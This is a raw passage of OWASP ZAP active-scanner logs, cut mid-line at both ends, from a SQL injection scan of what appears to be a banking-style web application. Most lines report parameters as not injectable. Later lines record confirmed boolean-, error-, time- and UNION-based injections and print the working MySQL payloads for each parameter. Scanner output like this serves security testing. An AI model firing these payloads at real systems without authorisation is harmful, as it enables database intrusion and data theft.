injectable 8970005 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8970440 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8970441 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8970816 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8970825 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8971257 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8971264 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'newAnticsrfToken' is not injectable 8971499 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8971628 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8971789 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8971982 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8972398 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8972399 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8972876 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8972880 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8973091 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'anticsrf' is not injectable 8973222 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8973434 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8974199 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 8974252 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8974509 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8974701 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8975088 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8975257 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8975327 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput2' is not injectable 8975659 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8975659 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8976067 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8976067 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8976479 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8976481 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8976872 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8976875 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8977359 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8977361 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8977663 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8977664 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8978067 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8978077 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8978476 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8978477 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8979030 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8979033 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8979809 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8979816 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8980433 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8980435 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8980879 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8980879 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8981281 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8981282 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8981595 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8981937 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8981944 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8982342 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8982343 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8982738 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8982740 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8983145 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8983159 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'newAnticsrfToken' is not injectable 8983523 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8983523 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8983529 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8984275 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8984278 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8984294 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8984406 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8984745 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8984745 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8984970 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'anticsrf' is not injectable 8985459 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8985476 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8985953 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8985961 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8986385 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8986391 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8986718 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'userinput' is not injectable 8986745 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 1381=1381] on parameter 'minBalanace' 8986762 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8986778 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (7284=7284) THEN 7284 ELSE 7284*(SELECT 7284 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 8986779 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8986782 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 7969 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7969=7969,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 8986784 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 2744 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2744=2744,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 8986784 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8986784 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8996822 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))UGLz)] on parameter 'minBalanace' 8996822 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))jVwj)] on parameter 'msgid' 8996823 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8996823 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8996842 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8996850 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 8996886 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8996895 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 8996913 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8996925 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 8996963 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8996972 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 8997161 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [1 AND 8636=8636] on parameter 'msgId' 8997162 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8997163 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [132 AND 9719=9719] on parameter 'transactionId' 8997165 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8997166 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 1423 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1423=1423,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 8997167 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 8997168 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [132 AND (SELECT 8024 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8024=8024,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 8997169 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9007205 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))iHGV)] on parameter 'msgId' 9007206 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9007208 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [132 AND (SELECT * FROM (SELECT(SLEEP(5)))OWIx)] on parameter 'transactionId' 9007209 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9007225 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9007227 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9007230 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9007232 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9007275 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9007281 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9007282 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9007286 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9007303 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9007307 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9007308 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9007309 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9007310 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9007313 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9007314 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [132 #] on parameter 'transactionId' 9007315 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9007489 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (7701=7701) THEN 7701 ELSE 7701*(SELECT 7701 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionDate' 9007491 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9007525 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-02-02' AND (SELECT 4816 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4816=4816,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sVKB'='sVKB] on parameter 'transactionDate' 9007526 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9007527 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 2899 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2899=2899,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionDate' 9007527 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9017561 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02 AND (SELECT * FROM (SELECT(SLEEP(5)))fnPr)] on parameter 'transactionDate' 9017563 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9017578 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9017582 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9017590 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))AoTx) AND 'PNWL'='PNWL] on parameter 'transactionDate' 9017591 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9017618 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9017622 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9017643 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9017647 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9017655 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-02-02 #] on parameter 'transactionDate' 9017656 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9017693 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 3999=3999 AND 'kvUj'='kvUj] on parameter 'transactionDate' 9017694 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9017700 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 6726 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6726=6726,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wsdg'='wsdg] on parameter 'transactionDate' 9017701 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9018092 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 8566=8566 AND 'pYRZ'='pYRZ] on parameter 'transactionDate' 9018093 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9018100 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 9549 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9549=9549,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'llof'='llof] on parameter 'transactionDate' 9018100 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9027748 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))gAuj) AND 'aluN'='aluN] on parameter 'transactionDate' 9027749 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9027889 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9027890 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9028111 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (5600=5600) THEN 5600 ELSE 5600*(SELECT 5600 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9028112 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9028114 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 3823 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3823=3823,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9028115 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9028136 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))izEH) AND 'chXZ'='chXZ] on parameter 'transactionDate' 9028137 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9028186 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9028191 [ZAP-ActiveScanner-1] INFO 